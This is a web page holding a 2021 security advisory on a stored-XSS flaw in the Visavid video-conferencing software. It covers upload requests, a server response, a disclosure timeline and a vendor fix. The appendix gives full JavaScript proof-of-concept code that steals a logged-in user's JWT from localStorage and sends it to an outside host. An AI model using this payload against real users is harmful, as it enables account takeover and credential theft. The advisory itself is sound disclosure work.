<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Advisory - Visavid account hijack via stored XSS | Red vs. Blue Shell</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Advisory - Visavid account hijack via stored XSS" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Product description Kommunizieren, präsentieren, fortbilden: Unsere flexible Videokonferenz-Software ist von der Entwicklung bis zum Support zu 100 % Made in Germany und bietet neben Datenschutz und einem hohen Sicherheits-Level auch individuelle Anpassungsmöglichkeiten für unterschiedliche Einsatzbereiche." />
<meta property="og:description" content="Product description Kommunizieren, präsentieren, fortbilden: Unsere flexible Videokonferenz-Software ist von der Entwicklung bis zum Support zu 100 % Made in Germany und bietet neben Datenschutz und einem hohen Sicherheits-Level auch individuelle Anpassungsmöglichkeiten für unterschiedliche Einsatzbereiche." />
<link rel="canonical" href="/advisory/2021/04/27/visavid-stored-xss-jwt.html" />
<meta property="og:url" content="/advisory/2021/04/27/visavid-stored-xss-jwt.html" />
<meta property="og:site_name" content="Red vs. Blue Shell" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-04-27T00:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Advisory - Visavid account hijack via stored XSS" />
<script type="application/ld+json">
{"description":"Product description Kommunizieren, präsentieren, fortbilden: Unsere flexible Videokonferenz-Software ist von der Entwicklung bis zum Support zu 100 % Made in Germany und bietet neben Datenschutz und einem hohen Sicherheits-Level auch individuelle Anpassungsmöglichkeiten für unterschiedliche Einsatzbereiche.","@type":"BlogPosting","headline":"Advisory - Visavid account hijack via stored XSS","dateModified":"2021-04-27T00:00:00+00:00","datePublished":"2021-04-27T00:00:00+00:00","mainEntityOfPage":{"@type":"WebPage","@id":"/advisory/2021/04/27/visavid-stored-xss-jwt.html"},"url":"/advisory/2021/04/27/visavid-stored-xss-jwt.html","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="/feed.xml" title="Red vs. Blue Shell" />
</head>
<body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Red vs. Blue Shell</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Advisory - Visavid account hijack via stored XSS </h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2021-04-27T00:00:00+00:00" itemprop="datePublished">Apr 27, 2021
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody"><p class="advisory-details">

<table>
    <tr>
        <th>Product:</th>
        <th>Visavid</th>
    </tr>
    <tr>
        <th>Homepage:</th>
        <th><a href="https://visavid.de/">https://visavid.de/</a></th>
    </tr>



    
    <tr>
        <th>Vulnerable version:</th>
        <th>Gateway 1.10.3, Verwaltung: 1.10.10</th>
    </tr>
    <tr>
        <th>Fixed version:</th>
        <th>Gateway 1.10.3, Verwaltung: 1.10.14</th>
    </tr>
    <tr>
        <th>CVSS Score:</th>
        <th><span class="HIGH">HIGH 8.0</span> - <a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a>
        </th>
    </tr>
    <tr>
        <th>Found:</th><th>Apr 22, 2021</th>
    </tr>
</table>

</p><h1 id="product-description">Product description</h1>
<p>Kommunizieren, präsentieren, fortbilden: Unsere flexible Videokonferenz-Software ist von der Entwicklung bis zum Support zu 100 % Made in Germany und bietet neben Datenschutz und einem hohen Sicherheits-Level auch individuelle Anpassungsmöglichkeiten für unterschiedliche Einsatzbereiche.</p>

<p><a href="https://auctores.de/software/produkte/">Auctores - Visavid</a></p>

<h1 id="vulnerability-overview">Vulnerability overview</h1>
<p>The software <code class="language-plaintext highlighter-rouge">Visavid</code> allows an <code class="language-plaintext highlighter-rouge">room</code> admin to upload files for the room. These uploaded files can then be accessed without authentication. As the content type/data of the uploaded file is not restricted, a <code class="language-plaintext highlighter-rouge">HTML</code> file with included <code class="language-plaintext highlighter-rouge">JavaScript</code> code can be uploaded.  If the victim visits the URL the <code class="language-plaintext highlighter-rouge">JWT</code> can be accessed from the <code class="language-plaintext highlighter-rouge">localStorage</code> and sent back to the attacker, which allows full access to the account.</p>

<h1 id="proof-of-concept">Proof of concept</h1>
<p>The endpoint <code class="language-plaintext highlighter-rouge">PUT /api/verwaltung/rooms/file/{ROOM-ID}</code> allows an user to upload files to a room. As the content type/data is not restricted a <code class="language-plaintext highlighter-rouge">HTML</code> file with malicious <code class="language-plaintext highlighter-rouge">JavaScript</code> code can be uploaded. The result to this requests contains the resource URL (<code class="language-plaintext highlighter-rouge">file.data.url</code>), which can be used to access the file without authentication. This URL can then be sent to a victim. If the victim opens the URL and is logged in the <code class="language-plaintext highlighter-rouge">JWT</code> can be stolen.</p>

<p>The request to upload a HTML file:</p>
<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">PUT</span> <span class="nn">/api/verwaltung/rooms/file/6f735b70-27ee-41dc-a1df-778446f40fcc</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">staging.visavid.de</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">application/hal+json</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.5</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate</span>
<span class="na">Authorization</span><span class="p">:</span> <span class="s">Bearer XXX</span>
<span class="na">Content-Type</span><span class="p">:</span> <span class="s">multipart/form-data; boundary=---------------------------266190233231735721582577257025</span>
<span class="na">Content-Length</span><span class="p">:</span> <span class="s">2567</span>
<span class="na">Origin</span><span class="p">:</span> <span class="s">https://staging.visavid.de</span>
<span class="na">DNT</span><span class="p">:</span> <span class="s">1</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">close</span>

-----------------------------266190233231735721582577257025
Content-Disposition: form-data; name="id"

6f735b70-27ee-41dc-a1df-778446f40fcc
-----------------------------266190233231735721582577257025
Content-Disposition: form-data; name="file_file"; filename="extract-jwt.html"
Content-Type: text/html

&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;meta charset="UTF-8"&gt;
&lt;title&gt;Visavid - Stored XSS&lt;/title&gt;

........

&lt;/html&gt;
-----------------------------266190233231735721582577257025
Content-Disposition: form-data; name="view_initial"

false
-----------------------------266190233231735721582577257025
Content-Disposition: form-data; name="room_id"

{"id":"{ROOM-ID}"}
-----------------------------266190233231735721582577257025--

</code></pre></div></div>
<p>The response contains the resource URL, which is available without login:</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"file"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"data"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
            </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"141f4e8fX178b54d7629XY7fa1"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"url"</span><span class="p">:</span><span class="w"> </span><span class="s2">"resources/466524208/141f4e8fX178b54d7629XY7fa1/ORG/extract-jwt.html"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"extract-jwt.html"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">1910</span><span class="p">,</span><span class="w">
            </span><span class="nl">"alias"</span><span class="p">:</span><span class="w"> </span><span class="s2">"default"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"index"</span><span class="p">:</span><span class="w"> </span><span class="s2">"visavid"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"format"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ORG"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"public"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
            </span><span class="nl">"imgWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
            </span><span class="nl">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"text/html"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"extension"</span><span class="p">:</span><span class="w"> </span><span class="s2">"html"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"imgHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
            </span><span class="nl">"timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mi">1619090844873</span><span class="p">,</span><span class="w">
            </span><span class="nl">"indexHashed"</span><span class="p">:</span><span class="w"> </span><span class="s2">"466524208"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"imgColorSpace"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
            </span><span class="nl">"entityId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"6f735b70-27ee-41dc-a1df-778446f40fcc"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"entityPath"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/rooms/file"</span><span class="w">
        </span><span class="p">},</span><span class="w">
        </span><span class="nl">"url"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/api/verwaltung/rooms/file/6f735b70-27ee-41dc-a1df-778446f40fcc/blobs/3143036/{FORMAT}/extract-jwt.html"</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="nl">"view_initial"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"defaultvalue"</span><span class="p">:</span><span class="w"> </span><span class="s2">"extract-jwt.html"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"6f735b70-27ee-41dc-a1df-778446f40fcc"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>If the victim open the resource URL <code class="language-plaintext highlighter-rouge">https://staging.visavid.de/resources/466524208/141f4e8fX178b54d7629XY7fa1/ORG/extract-jwt.html</code> the <code class="language-plaintext highlighter-rouge">JavaScript</code> code is executed.</p>

<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GET</span> <span class="nn">/resources/466524208/141f4e8fX178b54d7629XY7fa1/ORG/extract-jwt.html</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">staging.visavid.de</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.5</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate</span>
<span class="na">DNT</span><span class="p">:</span> <span class="s">1</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">close</span>
<span class="na">Upgrade-Insecure-Requests</span><span class="p">:</span> <span class="s">1</span>
<span class="na">Pragma</span><span class="p">:</span> <span class="s">no-cache</span>
<span class="na">Cache-Control</span><span class="p">:</span> <span class="s">no-cache</span>


</code></pre></div></div>

<p>To demonstrate  the impact a small <code class="language-plaintext highlighter-rouge">JWT</code> stealing PoC was created (full source in appendix).
If the victim is already logged in the current <code class="language-plaintext highlighter-rouge">JWT</code> is sent back to the attacker. 
<img src="/assets/visavid/210422-stored-xss-logged-in.png" alt="already logged in" /></p>

<p>Otherwise the normal login prompt is shown and the stealing function is called every two second until the user is logged in and the token is sent back.
<img src="/assets/visavid/210422-stored-xss-login-page.png" alt="not logged in" /></p>

<p>After the user logged in:
<img src="/assets/visavid/210422-stored-xss-after-login.png" alt="after login" /></p>

<h1 id="timeline">Timeline</h1>
<ul>
  <li>2021-04-22: Sent report to vendor</li>
  <li>2021-04-23: Vendor acknowledged vulnerability</li>
  <li>2021-04-26: Vendor informed that the issue is fixed</li>
  <li>2021-04-27: Public release of security advisory</li>
</ul>

<h1 id="reference">Reference</h1>
<ul>
  <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-storage-on-client-side">OWASP - JSON Web Token</a></li>
  <li><a href="https://owasp.org/www-community/attacks/xss/">OWASP - Cross Site Scripting</a></li>
  <li><a href="https://medium.com/swlh/whats-the-secure-way-to-store-jwt-dd362f5b7914">Medium - Whats the secure way to store JWT</a></li>
</ul>

<h1 id="appendix">Appendix</h1>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE html&gt;</span>
<span class="nt">&lt;html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">&gt;</span>
<span class="nt">&lt;meta</span> <span class="na">charset=</span><span class="s">"UTF-8"</span><span class="nt">&gt;</span>
<span class="nt">&lt;title&gt;</span>Visavid - Stored XSS<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;style&gt;</span>
<span class="nt">&lt;/style&gt;</span>
<span class="nt">&lt;body&gt;</span>    
    <span class="nt">&lt;div&gt;</span>
        Please wait while you are redirected....
    <span class="nt">&lt;/div&gt;</span>
    <span class="nt">&lt;script&gt;</span>
        <span class="kd">const</span> <span class="nx">EX_URL</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">https://visavid.netlog-py.ml/token?v=</span><span class="dl">"</span><span class="p">;</span>        
        <span class="kd">var</span> <span class="nx">success</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>

        <span class="kd">function</span> <span class="nx">exfiltrateToken</span><span class="p">(</span><span class="nx">token</span><span class="p">)</span> <span class="p">{</span>
            <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">JWT token: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">token</span><span class="p">);</span>
            
            <span class="kd">var</span> <span class="nx">b</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">body</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span>
            <span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">img</span><span class="dl">"</span><span class="p">);</span>
            <span class="nx">img</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">EX_URL</span> <span class="o">+</span> <span class="nx">btoa</span><span class="p">(</span><span class="nx">token</span><span class="p">)</span>
            <span class="nx">b</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">img</span><span class="p">);</span>

        <span class="p">}</span>
        <span class="kd">function</span> <span class="nx">steal</span><span class="p">()</span> <span class="p">{</span>

            <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nx">success</span><span class="p">)</span> <span class="p">{</span>
                <span class="kd">var</span> <span class="nx">token</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="dl">"</span><span class="s2">_id_token</span><span class="dl">"</span><span class="p">);</span>
                <span class="k">if</span><span class="p">(</span> <span class="nx">token</span><span class="p">)</span> <span class="p">{</span>                
                    <span class="nx">exfiltrateToken</span><span class="p">(</span><span class="nx">token</span><span class="p">);</span>
                    <span class="nx">success</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
                    
                <span class="p">}</span>                
            <span class="p">}</span>
            <span class="k">return</span> <span class="nx">success</span><span class="p">;</span>
        <span class="p">}</span>        

        <span class="k">if</span><span class="p">(</span> <span class="o">!</span><span class="nx">steal</span><span class="p">())</span> <span class="p">{</span>

            <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Loading login page, because steal failed.</span><span class="dl">"</span><span class="p">);</span>
            <span class="kd">var</span> <span class="nx">xhttp</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
            <span class="nx">xhttp</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mi">4</span> <span class="o">&amp;&amp;</span> <span class="k">this</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mi">200</span><span class="p">)</span> <span class="p">{</span>
                    <span class="nb">window</span><span class="p">.</span><span class="nx">history</span><span class="p">.</span><span class="nx">pushState</span><span class="p">({</span><span class="dl">"</span><span class="s2">html</span><span class="dl">"</span><span class="p">:</span><span class="dl">""</span><span class="p">,</span><span class="dl">"</span><span class="s2">pageTitle</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">Login</span><span class="dl">"</span><span class="p">},</span><span class="dl">""</span><span class="p">,</span> <span class="dl">"</span><span class="s2">/app/login</span><span class="dl">"</span><span class="p">);</span>
                    <span class="nb">document</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">text/html</span><span class="dl">"</span><span class="p">);</span>
                    <span class="kd">var</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">img-src 'self' blob: data: cdn.visavid.de visavid.de</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">img-src *</span><span class="dl">"</span><span class="p">);</span>
                    <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span>                
                    <span class="nb">document</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
                <span class="p">}</span>
            <span class="p">};</span>
            <span class="nx">xhttp</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">/app</span><span class="dl">"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
            <span class="nx">xhttp</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>                        
            
            <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Setup steal callback</span><span class="dl">"</span><span class="p">);</span>
            <span class="nx">setInterval</span><span class="p">(</span><span class="nx">steal</span><span class="p">,</span> <span class="mi">2000</span><span class="p">);</span>
        <span class="p">}</span>
        
    <span class="nt">&lt;/script&gt;</span>
<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div>

  </div>

  <a class="u-url" href="/advisory/2021/04/27/visavid-stored-xss-jwt.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
        <p class="feed-subscribe">
          <a href="/feed.xml">
            <svg class="svg-icon orange">
              <use xlink:href="/assets/minima-social-icons.svg#rss"></use>
            </svg><span>Subscribe</span>
          </a>
        </p>
      </div>
      <div class="footer-col">
        <p>Posts about IT Security, pentesting and bug bounty hunting.</p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"><li>
  <a rel="me" href="https://github.com/stuxxn" target="_blank" title="github">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#github"></use>
    </svg>
  </a>
</li>
<li>
  <a rel="me" href="https://twitter.com/stuxxn" target="_blank" title="twitter">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#twitter"></use>
    </svg>
  </a>
</li>
</ul>
</div>

  </div>

</footer>
</body>

</html>
